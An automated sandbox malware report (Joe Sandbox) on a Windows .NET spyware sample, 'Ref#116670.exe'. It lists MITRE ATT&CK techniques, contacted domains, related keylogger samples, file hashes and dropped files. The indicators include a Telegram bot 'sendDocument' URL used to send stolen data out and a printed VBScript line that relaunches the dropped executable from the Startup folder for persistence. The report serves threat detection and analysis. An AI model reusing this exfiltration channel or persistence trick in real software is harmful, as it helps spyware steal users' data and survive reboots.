                    Source: Yara match File source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4956, type: MEMORYSTR

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                    Resource Development: Scripting (111); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                    Execution: Native API (1); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                    Persistence: Scripting (111); DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                    Privilege Escalation: DLL Side-Loading (1); Process Injection (211); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                    Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (31); Process Injection (211)
                    Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                    Discovery: File and Directory Discovery (2); System Information Discovery (13); Security Software Discovery (21); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); System Owner/User Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                    Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                    Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                    [Behavior graph] Behavior Graph ID: 1567428, Sample: Ref#116670.exe, Startdate: 03/12/2024, Architecture: WINDOWS, Score: 100

                    Source | Detection | Scanner | Label | Link
                    Ref#116670.exe | 18% | ReversingLabs
                    Ref#116670.exe | 100% | Joe Sandbox ML

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\vdvfyt.exe | 100% | Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\vdvfyt.exe | 18% | ReversingLabs

                    No Antivirus matches
                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    https://oshi.at/RMDT | 0% | Avira URL Cloud | safe
                    https://oshi.at | 0% | Avira URL Cloud | safe

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    oshi.at | 194.15.112.248 | true | false | | high
                    reallyfreegeoip.org | 172.67.177.134 | true | false | | high
                    checkip.dyndns.com | 132.226.247.73 | true | false | | high
                    checkip.dyndns.org | unknown | unknown | false | | high

                    Name | Malicious | Antivirus Detection | Reputation
                    https://oshi.at/RMDT | false | Avira URL Cloud: safe | unknown
                    http://checkip.dyndns.org/ | false | | high
                    https://reallyfreegeoip.org/xml/8.46.123.228 | false | | high

                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://stackoverflow.com/q/14436606/23354 | Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2250767887.000000000272F000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://github.com/mgravell/protobuf-netJ | Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://reallyfreegeoip.orgd | InstallUtil.exe, 00000003.00000002.3287082945.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000293D000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://ocsps.ssl.com0? | Ref#116670.exe, vdvfyt.exe.0.dr | false | | high
                    http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0 | Ref#116670.exe, vdvfyt.exe.0.dr | false | | high
                    https://github.com/mgravell/protobuf-net | Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp | false | | high
                    https://oshi.at | Ref#116670.exe, 00000000.00000002.2250767887.0000000002681000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.0000000002951000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q | Ref#116670.exe, vdvfyt.exe.0.dr | false | | high
                    http://ocsps.ssl.com0 | Ref#116670.exe, vdvfyt.exe.0.dr | false | | high
                    https://reallyfreegeoip.org/xml/8.46.123.228d | InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0 | Ref#116670.exe, vdvfyt.exe.0.dr | false | | high
                    http://checkip.dyndns.org | InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000290B000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0 | Ref#116670.exe, vdvfyt.exe.0.dr | false | | high
                    http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0 | Ref#116670.exe, vdvfyt.exe.0.dr | false | | high
                    http://crls.ssl.com/ssl.com-rsa-RootCA.crl0 | Ref#116670.exe, vdvfyt.exe.0.dr | false | | high
                    https://github.com/mgravell/protobuf-neti | Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp | false | | high
                    http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0 | Ref#116670.exe, vdvfyt.exe.0.dr | false | | high
                    http://checkip.dyndns.comd | InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmp | false
                                                                  high
                                                                  https://stackoverflow.com/q/11564914/23354;Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://stackoverflow.com/q/2152978/23354Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://reallyfreegeoip.org/xml/8.46.123.228lInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://checkip.dyndns.org/qRef#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.ssl.com/repository0Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                                            high
                                                                            http://ocsps.ssl.com0_Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                                              high
                                                                              http://reallyfreegeoip.orgInstallUtil.exe, 00000003.00000002.3287082945.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000293D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://checkip.dyndns.orgdInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://reallyfreegeoip.orgInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://checkip.dyndns.comInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://checkip.dyndns.org/dInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRef#116670.exe, 00000000.00000002.2250767887.0000000002681000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.0000000002951000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                                                            high
                                                                                            https://api.telegram.org/bot-/sendDocument?chat_id=Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://reallyfreegeoip.org/xml/Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3283656497.0000000000413000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
194.15.112.248 | oshi.at | Ukraine | 213354 | INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB | false
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1567428
                                                                                                Start date and time:2024-12-03 15:19:19 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 8m 22s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:8
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:Ref#116670.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 93%
                                                                                                • Number of executed functions: 351
                                                                                                • Number of non-executed functions: 39
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                • VT rate limit hit for: Ref#116670.exe
Time | Type | Description
09:20:11 | API Interceptor | 81x Sleep call for process: Ref#116670.exe modified
09:20:41 | API Interceptor | 44x Sleep call for process: vdvfyt.exe modified
15:20:32 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                                                                                                                                • 172.67.177.134
                                                                                                                                678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBRef#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                1pXdiCesZ6.exeGet hashmaliciousDanaBotBrowse
                                                                                                                                • 194.15.112.203
                                                                                                                                bad.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.113.200
                                                                                                                                FromRussiaWithLove.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.112.70
                                                                                                                                x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.113.210
                                                                                                                                CLOUDFLARENETUSIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 104.26.13.205
                                                                                                                                uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.96.6
                                                                                                                                BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 104.26.13.205
                                                                                                                                uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.194.230
                                                                                                                                SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 104.26.13.205
                                                                                                                                uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.6
                                                                                                                                2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.194.230
                                                                                                                                Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 172.67.201.49
                                                                                                                                2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.6
                                                                                                                                UTMEMUSIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                54328bd36c14bd82ddaa0c04b25ed9adIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                RFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                Bestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 194.15.112.248
                                                                                                                                No context
                                                                                                                                Process:C:\Users\user\Desktop\Ref#116670.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):82
                                                                                                                                Entropy (8bit):4.857433335219371
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:FER/n0eFHHoUkh4EaKC5NkOAHn:FER/lFHI9aZ5WOO
                                                                                                                                MD5:278A3D41EC90C67BD2AEC0C23113F882
                                                                                                                                SHA1:07244A9A01574BD05380E919CEE57189F6CDEA43
                                                                                                                                SHA-256:79CFBE2DE71D82949C83E56CB2D0BCEF4AAA4797C1129E94EE76DF9866840DFD
                                                                                                                                SHA-512:B81E0DF8253AF105CF47853C99C76715EB69B6F39ADDF87711290AECFA2BB48CFFF53F6CBFE02565E301F52D05AE1B608669DF69F4F974FFDA2000AF55A4C30B
                                                                                                                                Malicious:true
                                                                                                                                Reputation:low
                                                                                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\vdvfyt.exe"""
                                                                                                                                Process:C:\Users\user\Desktop\Ref#116670.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):347104
                                                                                                                                Entropy (8bit):5.700437152022766
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:X9er2G/ROGPIC8VM/+44e2Pb4w45Q97d3O6M:XRdo/+44e2Pb4N5Q97dE
                                                                                                                                MD5:9D61B7E79D1B236CEA4327B484A3D53F
                                                                                                                                SHA1:1DF1FFDA46B2710FBE2D415A508AFD609D6723A4
                                                                                                                                SHA-256:2C3A0CBF5B82B051C9D3DB1307F68DB266EBA44352A8F750E5553DBC58B5CF91
                                                                                                                                SHA-512:FF5613A3A2B9DBE15CD228B0F87728AB973CB95966D49B727EF7E3DE52182973DFBD0C407910AB7BB80196335BD1CE16E8C0E0FA4516AA549A9B27A1EE41A0A8
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                Reputation:low
                                                                                                                                Process:C:\Users\user\Desktop\Ref#116670.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):26
                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                Malicious:true
                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Entropy (8bit):5.700437152022766
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:Ref#116670.exe
                                                                                                                                File size:347'104 bytes
                                                                                                                                MD5:9d61b7e79d1b236cea4327b484a3d53f
                                                                                                                                SHA1:1df1ffda46b2710fbe2d415a508afd609d6723a4
                                                                                                                                SHA256:2c3a0cbf5b82b051c9d3db1307f68db266eba44352a8f750e5553dbc58b5cf91
                                                                                                                                SHA512:ff5613a3a2b9dbe15cd228b0f87728ab973cb95966d49b727ef7e3de52182973dfbd0c407910ab7bb80196335bd1ce16e8c0e0fa4516aa549a9b27a1ee41a0a8
                                                                                                                                SSDEEP:6144:X9er2G/ROGPIC8VM/+44e2Pb4w45Q97d3O6M:XRdo/+44e2Pb4N5Q97dE
                                                                                                                                TLSH:0F747107F7C1D4D6CE507772F4971A01B3A0FCC06A8FDE0A6A5673D80973BA669C618A
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g+Ng.............................9... ...@....@.. ....................................`................................
                                                                                                                                Icon Hash:b04a484c4c4a4eb0
                                                                                                                                Entrypoint:0x44398e
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:true
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x674E2B67 [Mon Dec 2 21:49:27 2024 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
